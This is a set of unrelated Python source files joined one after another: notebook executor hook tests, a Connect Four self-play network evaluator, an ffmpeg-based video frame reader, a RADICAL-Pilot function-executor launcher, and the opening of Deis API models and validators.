cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_no_source(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(
# Stripped source is empty
source=' ',
metadata={},
cell_type='code',
outputs=[],
)
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks()
def test_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[5:]:
hook.assert_not_called()
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell_hooks(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:1]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[1:]:
hook.assert_not_called()
@prepare_cell_mocks()
def test_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
|
evaluator_c4.py
|
"""
Python 3.9 класс арены для сопоставления
Название файла evalator_c4.py
класс арены для сопоставления текущей нейронной сети с нейронной сетью из предыдущей итерации, и сохраняет
нейронную сеть, которая выигрывает большинство игр
Version: 0.1
Author: Andrej Marinchenko
Date: 2021-12-20
"""
#!/usr/bin/env python
import os.path
import torch
import numpy as np
from alpha_net_c4 import ConnectNet
from connect_board import board as cboard
import encoder_decoder_c4 as ed
import copy
from MCTS_c4 import UCT_search, do_decode_n_move_pieces, get_policy
import pickle
import torch.multiprocessing as mp
import datetime
import logging
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def save_as_pickle(filename, data):
completeName = os.path.join("./evaluator_data/",\
filename)
with open(completeName, 'wb') as output:
pickle.dump(data, output)
def load_pickle(filename):
completeName = os.path.join("./evaluator_data/",\
filename)
with open(completeName, 'rb') as pkl_file:
data = pickle.load(pkl_file)
return data
class arena():
def __init__(self, current_cnet, best_cnet):
self.current = current_cnet
self.best = best_cnet
def play_round(self):
logger.info("Starting game round...")
if np.random.uniform(0,1) <= 0.5:
white = self.current; black = self.best; w = "current"; b = "best"
else:
white = self.best; black = self.current; w = "best"; b = "current"
current_board = cboard()
checkmate = False
dataset = []
value = 0; t = 0.1
while checkmate == False and current_board.actions() != []:
dataset.append(copy.deepcopy(ed.encode_board(current_board)))
print(""); print(current_board.current_board)
if current_board.player == 0:
root = UCT_search(current_board,777,white,t)
policy = get_policy(root, t); print("Policy: ", policy, "white = %s" %(str(w)))
elif current_board.player == 1:
root = UCT_search(current_board,777,black,t)
policy = get_policy(root, t); print("Policy: ", policy, "black = %s" %(str(b)))
current_board = do_decode_n_move_pieces(current_board,\
np.random.choice(np.array([0,1,2,3,4,5,6]), \
p = policy)) # decode move and move piece(s)
if current_board.check_winner() == True: # someone wins
if current_board.player == 0: # black wins
value = -1
elif current_board.player == 1: # white wins
value = 1
checkmate = True
dataset.append(ed.encode_board(current_board))
if value == -1:
dataset.append(f"{b} as black wins")
return b, dataset
elif value == 1:
dataset.append(f"{w} as white wins")
return w, dataset
else:
dataset.append("Nobody wins")
return None, dataset
def evaluate(self, num_games, cpu):
current_wins = 0
logger.info("[CPU %d]: Starting games..." % cpu)
for i in range(num_games):
with torch.no_grad():
winner, dataset = self.play_round(); print("%s wins!" % winner)
if winner == "current":
current_wins += 1
save_as_pickle("evaluate_net_dataset_cpu%i_%i_%s_%s" % (cpu,i,datetime.datetime.today().strftime("%Y-%m-%d"),\
str(winner)),dataset)
print("Current_net wins ratio: %.5f" % (current_wins/num_games))
save_as_pickle("wins_cpu_%i" % (cpu),\
{"best_win_ratio": current_wins/num_games, "num_games":num_games})
logger.info("[CPU %d]: Finished arena games!" % cpu)
def fork_process(arena_obj, num_games, cpu): # make arena picklable
arena_obj.evaluate(num_games, cpu)
def evaluate_nets(args, iteration_1, iteration_2) :
logger.info("Loading nets...")
current_net="%s_iter%d.pth.tar" % (args.neural_net_name, iteration_2); best_net="%s_iter%d.pth.tar" % (args.neural_net_name, iteration_1)
current_net_filename = os.path.join("./model_data/",\
current_net)
best_net_filename = os.path.join("./model_data/",\
best_net)
logger.info("Current net: %s" % current_net)
logger.info("Previous (Best) net: %s" % best_net)
current_cnet = ConnectNet()
best_cnet = ConnectNet()
cuda = torch.cuda.is_available()
if cuda:
current_cnet.cuda()
best_cnet.cuda()
if not os.path.isdir("./evaluator_data/"):
os.mkdir("evaluator_data")
if args.MCTS_num_processes > 1:
mp.set_start_method("spawn",force=True)
current_cnet.share_memory(); best_cnet.share_memory()
current_cnet.eval(); best_cnet.eval()
checkpoint = torch.load(current_net_filename)
current_cnet.load_state_dict(checkpoint['state_dict'])
checkpoint = torch.load(best_net_filename)
best_cnet.load_state_dict(checkpoint['state_dict'])
processes = []
if args.MCTS_num_processes > mp.cpu_count():
num_processes = mp.cpu_count()
logger.info("Required number of processes exceed number of CPUs! Setting MCTS_num_processes to %d" % num_processes)
else:
num_processes = args.MCTS_num_processes
logger.info("Spawning %d processes..." % num_processes)
with torch.no_grad():
for i in range(num_processes):
p = mp.Process(target=fork_process,args=(arena(current_cnet,best_cnet), args.num_evaluator_games, i))
p.start()
processes.append(p)
for p in processes:
p.join()
wins_ratio = 0.0
for i in range(num_processes):
stats = load_pickle("wins_cpu_%i" % (i))
wins_ratio += stats['best_win_ratio']
wins_ratio = wins_ratio/num_processes
if wins_ratio >= 0.55:
return iteration_2
else:
return iteration_1
elif args.MCTS_num_processes == 1:
current_cnet.eval(); best_cnet.eval()
checkpoint = torch.load(current_net_filename)
current_cnet.load_state_dict(checkpoint['state_dict'])
checkpoint = torch.load(best_net_filename)
best_cnet.load_state_dict(checkpoint['state_dict'])
arena1 = arena(current_cnet=current_cnet, best_cnet=best_cnet)
arena1.evaluate(num_games=args.num_evaluator_games, cpu=0)
stats = load_pickle("wins_cpu_%i" % (0))
if stats.best_win_ratio >= 0.55:
return iteration_2
else:
return iteration_1
|
framereader.py
|
# pylint: skip-file
import json
import os
import pickle
import struct
import subprocess
import tempfile
import threading
from enum import IntEnum
from functools import wraps
import numpy as np
from lru import LRU
import _io
from tools.lib.cache import cache_path_for_file_path
from tools.lib.exceptions import DataUnreadableError
from common.file_helpers import atomic_write_in_dir
try:
from xx.chffr.lib.filereader import FileReader
except ImportError:
from tools.lib.filereader import FileReader
HEVC_SLICE_B = 0
HEVC_SLICE_P = 1
HEVC_SLICE_I = 2
class GOPReader:
def get_gop(self, num):
# returns (start_frame_num, num_frames, frames_to_skip, gop_data)
raise NotImplementedError
class DoNothingContextManager:
def __enter__(self):
return self
def __exit__(self, *x):
pass
class FrameType(IntEnum):
raw = 1
h265_stream = 2
def fingerprint_video(fn):
with FileReader(fn) as f:
header = f.read(4)
if len(header) == 0:
raise DataUnreadableError(f"{fn} is empty")
elif header == b"\x00\xc0\x12\x00":
return FrameType.raw
elif header == b"\x00\x00\x00\x01":
if 'hevc' in fn:
return FrameType.h265_stream
else:
raise NotImplementedError(fn)
else:
raise NotImplementedError(fn)
def ffprobe(fn, fmt=None):
cmd = ["ffprobe",
"-v", "quiet",
"-print_format", "json",
"-show_format", "-show_streams"]
if fmt:
cmd += ["-f", fmt]
cmd += [fn]
try:
ffprobe_output = subprocess.check_output(cmd)
except subprocess.CalledProcessError:
raise DataUnreadableError(fn)
return json.loads(ffprobe_output)
def vidindex(fn, typ):
vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex")
vidindex = os.path.join(vidindex_dir, "vidindex")
subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null", "w"))
with tempfile.NamedTemporaryFile() as prefix_f, \
tempfile.NamedTemporaryFile() as index_f:
try:
subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name])
except subprocess.CalledProcessError:
raise DataUnreadableError(f"vidindex failed on file {fn}")
with open(index_f.name, "rb") as f:
index = f.read()
with open(prefix_f.name, "rb") as f:
prefix = f.read()
index = np.frombuffer(index, np.uint32).reshape(-1, 2)
assert index[-1, 0] == 0xFFFFFFFF
assert index[-1, 1] == os.path.getsize(fn)
return index, prefix
def cache_fn(func):
@wraps(func)
def cache_inner(fn, *args, **kwargs):
if kwargs.pop('no_cache', None):
cache_path = None
else:
cache_prefix = kwargs.pop('cache_prefix', None)
cache_path = cache_path_for_file_path(fn, cache_prefix)
if cache_path and os.path.exists(cache_path):
with open(cache_path, "rb") as cache_file:
cache_value = pickle.load(cache_file)
else:
cache_value = func(fn, *args, **kwargs)
if cache_path:
with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
pickle.dump(cache_value, cache_file, -1)
return cache_value
return cache_inner
@cache_fn
def index_stream(fn, typ):
assert typ in ("hevc", )
with FileReader(fn) as f:
assert os.path.exists(f.name), fn
index, prefix = vidindex(f.name, typ)
probe = ffprobe(f.name, typ)
return {
'index': index,
'global_prefix': prefix,
'probe': probe
}
def index_videos(camera_paths, cache_prefix=None):
"""Requires that paths in camera_paths are contiguous and of the same type."""
if len(camera_paths) < 1:
raise ValueError("must provide at least one video to index")
frame_type = fingerprint_video(camera_paths[0])
for fn in camera_paths:
index_video(fn, frame_type, cache_prefix)
def index_video(fn, frame_type=None, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if os.path.exists(cache_path):
return
if frame_type is None:
frame_type = fingerprint_video(fn[0])
if frame_type == FrameType.h265_stream:
index_stream(fn, "hevc", cache_prefix=cache_prefix)
else:
raise NotImplementedError("Only h265 supported")
def get_video_index(fn, frame_type, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if not os.path.exists(cache_path):
index_video(fn, frame_type, cache_prefix)
if not os.path.exists(cache_path):
return None
with open(cache_path, "rb") as cache_file:
return pickle.load(cache_file)
def read_file_check_size(f, sz, cookie):
buff = bytearray(sz)
bytes_read = f.readinto(buff)
assert bytes_read == sz, (bytes_read, sz)
return buff
def rgb24toyuv420(rgb):
yuv_from_rgb = np.array([[ 0.299 , 0.587 , 0.114 ],
[-0.14714119, -0.28886916, 0.43601035 ],
[ 0.61497538, -0.51496512, -0.10001026 ]])
img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape)
y_len = img.shape[0] * img.shape[1]
uv_len = y_len // 4
ys = img[:, :, 0]
us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128
vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128
yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype)
yuv420[:y_len] = ys.reshape(-1)
yuv420[y_len:y_len + uv_len] = us.reshape(-1)
yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1)
return yuv420.clip(0, 255).astype('uint8')
def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt):
# using a tempfile is much faster than proc.communicate for some reason
with tempfile.TemporaryFile() as tmpf:
tmpf.write(rawdat)
tmpf.seek(0)
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
proc = subprocess.Popen(
["ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
"-vsync", "0",
"-f", vid_fmt,
"-flags2", "showall",
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
stdin=tmpf, stdout=subprocess.PIPE, stderr=open("/dev/null"))
# dat = proc.communicate()[0]
dat = proc.stdout.read()
if proc.wait() != 0:
raise DataUnreadableError("ffmpeg failed")
if pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3)
elif pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h*w*3//2))
elif pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w)
else:
raise NotImplementedError
return ret
class BaseFrameReader:
# properties: frame_type, frame_count, w, h
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def close(self):
pass
def get(self, num, count=1, pix_fmt="yuv420p"):
raise NotImplementedError
def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, index_data=None):
frame_type = fingerprint_video(fn)
if frame_type == FrameType.raw:
return RawFrameReader(fn)
elif frame_type in (FrameType.h265_stream,):
if not index_data:
index_data = get_video_index(fn, frame_type, cache_prefix)
return StreamFrameReader(fn, frame_type, index_data, readahead=readahead, readbehind=readbehind)
else:
raise NotImplementedError(frame_type)
class RawData:
def __init__(self, f):
self.f = _io.FileIO(f, 'rb')
self.lenn = struct.unpack("I", self.f.read(4))[0]
self.count = os.path.getsize(f) / (self.lenn+4)
def read(self, i):
self.f.seek((self.lenn+4)*i + 4)
return self.f.read(self.lenn)
class RawFrameReader(BaseFrameReader):
def __init__(self, fn):
# raw camera
self.fn = fn
self.frame_type = FrameType.raw
self.rawfile = RawData(self.fn)
self.frame_count = self.rawfile.count
self.w, self.h = 640, 480
def load_and_debayer(self, img):
img = np.frombuffer(img, dtype='uint8').reshape(960, 1280)
cimg = np.dstack([img[0::2, 1::2], ((img[0::2, 0::2].astype("uint16") + img[1::2, 1::2].astype("uint16")) >> 1).astype("uint8"), img[1::2, 0::2]])
return cimg
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
assert num+count <= self.frame_count
if pix_fmt not in ("yuv420p", "rgb24"):
raise ValueError(f"Unsupported pixel format {pix_fmt!r}")
app = []
for i in range(num, num+count):
dat = self.rawfile.read(i)
rgb_dat = self.load_and_debayer(dat)
if pix_fmt == "rgb24":
app.append(rgb_dat)
elif pix_fmt == "yuv420p":
app.append(rgb24toyuv420(rgb_dat))
else:
raise NotImplementedError
return app
class VideoStreamDecompressor:
def __init__(self, fn, vid_fmt, w, h, pix_fmt):
self.fn = fn
self.vid_fmt = vid_fmt
self.w = w
self.h = h
self.pix_fmt = pix_fmt
if pix_fmt == "yuv420p":
self.out_size = w*h*3//2 # yuv420p
elif pix_fmt in ("rgb24", "yuv444p"):
self.out_size = w*h*3
else:
raise NotImplementedError
self.proc = None
self.t = threading.Thread(target=self.write_thread)
self.t.daemon = True
def write_thread(self):
try:
with FileReader(self.fn) as f:
while True:
r = f.read(1024*1024)
if len(r) == 0:
break
self.proc.stdin.write(r)
finally:
self.proc.stdin.close()
def read(self):
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
cmd = [
"ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
# "-avioflags", "direct",
"-analyzeduration", "0",
"-probesize", "32",
"-flush_packets", "0",
# "-fflags", "nobuffer",
"-vsync", "0",
"-f", self.vid_fmt,
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", self.pix_fmt,
"pipe:1"
]
self.proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
try:
self.t.start()
while True:
dat = self.proc.stdout.read(self.out_size)
if len(dat) == 0:
break
assert len(dat) == self.out_size
if self.pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3))
elif self.pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8)
elif self.pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w))
else:
assert False
yield ret
result_code = self.proc.wait()
assert result_code == 0, result_code
finally:
self.proc.kill()
self.t.join()
class StreamGOPReader(GOPReader):
def __init__(self, fn, frame_type, index_data):
assert frame_type == FrameType.h265_stream
self.fn = fn
self.frame_type = frame_type
self.frame_count = None
self.w, self.h = None, None
self.prefix = None
self.index = None
self.index = index_data['index']
self.prefix = index_data['global_prefix']
probe = index_data['probe']
self.prefix_frame_data = None
self.num_prefix_frames = 0
self.vid_fmt = "hevc"
i = 0
while i < self.index.shape[0] and self.index[i, 0] != HEVC_SLICE_I:
i += 1
self.first_iframe = i
assert self.first_iframe == 0
self.frame_count = len(self.index) - 1
self.w = probe['streams'][0]['width']
self.h = probe['streams'][0]['height']
def _lookup_gop(self, num):
frame_b = num
while frame_b > 0 and self.index[frame_b, 0] != HEVC_SLICE_I:
frame_b -= 1
frame_e = num + 1
while frame_e < (len(self.index) - 1) and self.index[frame_e, 0] != HEVC_SLICE_I:
frame_e += 1
offset_b = self.index[frame_b, 1]
offset_e = self.index[frame_e, 1]
return (frame_b, frame_e, offset_b, offset_e)
def get_gop(self, num):
frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num)
assert frame_b <= num < frame_e
num_frames = frame_e - frame_b
with FileReader(self.fn) as f:
f.seek(offset_b)
rawdat = f.read(offset_e - offset_b)
if num < self.first_iframe:
assert self.prefix_frame_data
rawdat = self.prefix_frame_data + rawdat
rawdat = self.prefix + rawdat
skip_frames = 0
if num < self.first_iframe:
skip_frames = self.num_prefix_frames
return frame_b, num_frames, skip_frames, rawdat
class GOPFrameReader(BaseFrameReader):
#FrameReader with caching and readahead for formats that are group-of-picture based
def __init__(self, readahead=False, readbehind=False):
self.open_ = True
self.readahead = readahead
self.readbehind = readbehind
self.frame_cache = LRU(64)
if self.readahead:
self.cache_lock = threading.RLock()
self.readahead_last = None
self.readahead_len = 30
self.readahead_c = threading.Condition()
self.readahead_thread = threading.Thread(target=self._readahead_thread)
self.readahead_thread.daemon = True
self.readahead_thread.start()
else:
self.cache_lock = DoNothingContextManager()
def close(self):
if not self.open_:
return
self.open_ = False
if self.readahead:
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
self.readahead_thread.join()
def _readahead_thread(self):
while True:
self.readahead_c.acquire()
try:
if not self.open_:
break
self.readahead_c.wait()
finally:
self.readahead_c.release()
if not self.open_:
break
assert self.readahead_last
num, pix_fmt = self.readahead_last
if self.readbehind:
for k in range(num - 1, max(0, num - self.readahead_len), -1):
self._get_one(k, pix_fmt)
else:
for k in range(num, min(self.frame_count, num + self.readahead_len)):
self._get_one(k, pix_fmt)
def _get_one(self, num, pix_fmt):
assert num < self.frame_count
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
with self.cache_lock:
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
frame_b, num_frames, skip_frames, rawdat = self.get_gop(num)
ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt)
ret = ret[skip_frames:]
assert ret.shape[0] == num_frames
for i in range(ret.shape[0]):
self.frame_cache[(frame_b+i, pix_fmt)] = ret[i]
return self.frame_cache[(num, pix_fmt)]
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
if num + count > self.frame_count:
raise ValueError(f"{num + count} > {self.frame_count}")
if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"):
raise ValueError(f"Unsupported pixel format {pix_fmt!r}")
ret = [self._get_one(num + i, pix_fmt) for i in range(count)]
if self.readahead:
self.readahead_last = (num+count, pix_fmt)
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
return ret
class StreamFrameReader(StreamGOPReader, GOPFrameReader):
def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False):
StreamGOPReader.__init__(self, fn, frame_type, index_data)
GOPFrameReader.__init__(self, readahead, readbehind)
def GOPFrameIterator(gop_reader, pix_fmt):
dec = VideoStreamDecompressor(gop_reader.fn, gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt)
yield from dec.read()
def FrameIterator(fn, pix_fmt, **kwargs):
fr = FrameReader(fn, **kwargs)
if isinstance(fr, GOPReader):
yield from GOPFrameIterator(fr, pix_fmt)
else:
for i in range(fr.frame_count):
yield fr.get(i, pix_fmt=pix_fmt)[0]
|
funcs.py
|
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import stat
import time
import queue
import threading as mt
import subprocess
import radical.utils as ru
from .... import pilot as rp
from ... import utils as rpu
from ... import states as rps
from ... import constants as rpc
from .base import AgentExecutingComponent
# ------------------------------------------------------------------------------
#
class FUNCS(AgentExecutingComponent) :
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
AgentExecutingComponent.__init__ (self, cfg, session)
self._collector = None
self._terminate = mt.Event()
# --------------------------------------------------------------------------
#
def initialize(self):
self._pwd = os.getcwd()
self.gtod = "%s/gtod" % self._pwd
self.register_input(rps.AGENT_EXECUTING_PENDING,
rpc.AGENT_EXECUTING_QUEUE, self.work)
self.register_output(rps.AGENT_STAGING_OUTPUT_PENDING,
rpc.AGENT_STAGING_OUTPUT_QUEUE)
self.register_publisher (rpc.AGENT_UNSCHEDULE_PUBSUB)
self.register_subscriber(rpc.CONTROL_PUBSUB, self.command_cb)
addr_wrk = self._cfg['bridges']['funcs_req_queue']
addr_res = self._cfg['bridges']['funcs_res_queue']
self._log.debug('wrk in addr: %s', addr_wrk['addr_in' ])
self._log.debug('res out addr: %s', addr_res['addr_out'])
self._funcs_req = rpu.Queue(self._session, 'funcs_req_queue',
rpu.QUEUE_INPUT, self._cfg,
addr_wrk['addr_in'])
self._funcs_res = rpu.Queue(self._session, 'funcs_res_queue',
rpu.QUEUE_OUTPUT, self._cfg,
addr_res['addr_out'])
self._cancel_lock = ru.RLock()
self._cus_to_cancel = list()
self._cus_to_watch = list()
self._watch_queue = queue.Queue ()
self._pid = self._cfg['pid']
# run watcher thread
self._collector = mt.Thread(target=self._collect)
self._collector.daemon = True
self._collector.start()
# we need to launch the executors on all nodes, and use the
# agent_launcher for that
self._launcher = rp.agent.LaunchMethod.create(
name = self._cfg.get('agent_launch_method'),
cfg = self._cfg,
session = self._session)
# now run the func launcher on all nodes
ve = os.environ.get('VIRTUAL_ENV', '')
exe = ru.which('radical-pilot-agent-funcs')
if not exe:
exe = '%s/rp_install/bin/radical-pilot-agent-funcs' % self._pwd
for idx, node in enumerate(self._cfg['rm_info']['node_list']):
uid = 'func_exec.%04d' % idx
pwd = '%s/%s' % (self._pwd, uid)
funcs = {'uid' : uid,
'description': {'executable' : exe,
'arguments' : [pwd, ve],
'cpu_processes': 1,
'environment' : [],
},
'slots' : {'nodes' : [{'name' : node[0],
'uid' : node[1],
'cores' : [[0]],
'gpus' : []
}]
},
'cfg' : {'addr_wrk' : addr_wrk['addr_out'],
'addr_res' : addr_res['addr_in']
}
}
self._spawn(self._launcher, funcs)
# --------------------------------------------------------------------------
#
def command_cb(self, topic, msg):
self._log.info('command_cb [%s]: %s', topic, msg)
cmd = msg['cmd']
arg = msg['arg']
if cmd == 'cancel_units':
self._log.info("cancel_units command (%s)" % arg)
with self._cancel_lock:
self._cus_to_cancel.extend(arg['uids'])
return True
# --------------------------------------------------------------------------
#
def _spawn(self, launcher, funcs):
# NOTE: see documentation of funcs['sandbox'] semantics in the ComputeUnit
# class definition.
sandbox = '%s/%s' % (self._pwd, funcs['uid'])
fname = '%s/%s.sh' % (sandbox, funcs['uid'])
cfgname = '%s/%s.cfg' % (sandbox, funcs['uid'])
descr = funcs['description']
rpu.rec_makedir(sandbox)
ru.write_json(funcs.get('cfg'), cfgname)
launch_cmd, hop_cmd = launcher.construct_command(funcs, fname)
if hop_cmd : cmdline = hop_cmd
else : cmdline = fname
with open(fname, "w") as fout:
fout.write('#!/bin/sh\n\n')
# Create string for environment variable setting
fout.write('export RP_SESSION_ID="%s"\n' % self._cfg['sid'])
fout.write('export RP_PILOT_ID="%s"\n' % self._cfg['pid'])
fout.write('export RP_AGENT_ID="%s"\n' % self._cfg['aid'])
fout.write('export RP_SPAWNER_ID="%s"\n' % self.uid)
fout.write('export RP_FUNCS_ID="%s"\n' % funcs['uid'])
fout.write('export RP_GTOD="%s"\n' % self.gtod)
fout.write('export RP_TMP="%s"\n' % self._cu_tmp)
# also add any env vars requested in the unit description
if descr.get('environment', []):
for key,val in descr['environment'].items():
fout.write('export "%s=%s"\n' % (key, val))
fout.write('\n%s\n\n' % launch_cmd)
fout.write('RETVAL=$?\n')
fout.write("exit $RETVAL\n")
# done writing to launch script, get it ready for execution.
st = os.stat(fname)
os.chmod(fname, st.st_mode | stat.S_IEXEC)
fout = open('%s/%s.out' % (sandbox, funcs['uid']), "w")
ferr = open('%s/%s.err' % (sandbox, funcs['uid']), "w")
self._prof.prof('exec_start', uid=funcs['uid'])
funcs['proc'] = subprocess.Popen(args = cmdline,
executable = None,
stdin = None,
stdout = fout,
stderr = ferr,
preexec_fn = os.setsid,
close_fds = True,
shell = True,
cwd = sandbox)
self._prof.prof('exec_ok', uid=funcs['uid'])
# --------------------------------------------------------------------------
#
def work(self, units):
if not isinstance(units, list):
units = [units]
self.advance(units, rps.AGENT_EXECUTING, publish=True, push=False)
for unit in units:
assert(unit['description']['cpu_process_type'] == 'FUNC')
self._funcs_req.put(unit)
# --------------------------------------------------------------------------
#
def _collect(self):
while not self._terminate.is_set():
# pull units from "funcs_out_queue"
units = self._funcs_res.get_nowait(1000)
if units:
for unit in units:
unit['target_state'] = unit['state']
unit['pilot'] = self._pid
# self._log.debug('got %s [%s] [%s] [%s]',
# unit['uid'], unit['state'],
# unit['stdout'], unit['stderr'])
self.advance(units, rps.AGENT_STAGING_OUTPUT_PENDING,
publish=True, push=True)
else:
time.sleep(0.1)
# ------------------------------------------------------------------------------
|
models.py
|
# -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
import etcd
import importlib
import logging
import os
import re
import subprocess
import time
import threading
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from django_fsm import FSMField, transition
from django_fsm.signals import post_transition
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def log_event(app, msg, level=logging.INFO):
msg = "{}: {}".format(app.id, msg)
logger.log(level, msg) # django logger
app.log(msg) # local filesystem
def validate_base64(value):
"""Check that value contains only valid base64 characters."""
try:
base64.b64decode(value.split()[1])
except Exception as e:
raise ValidationError(e)
def validate_id_is_docker_compatible(value):
"""
Check that the ID follows docker's image name constraints
"""
match = re.match(r'^[a-z0-9-]+$', value)
if not match:
raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
for k, v in value.iteritems():
if int(v) < 0:
raise ValueError("Must be greater than or equal to zero")
except ValueError, err:
raise ValidationError(err)
def validate_reserved_names(value):
"""A value cannot use some reserved names."""
if value in ['deis']:
raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
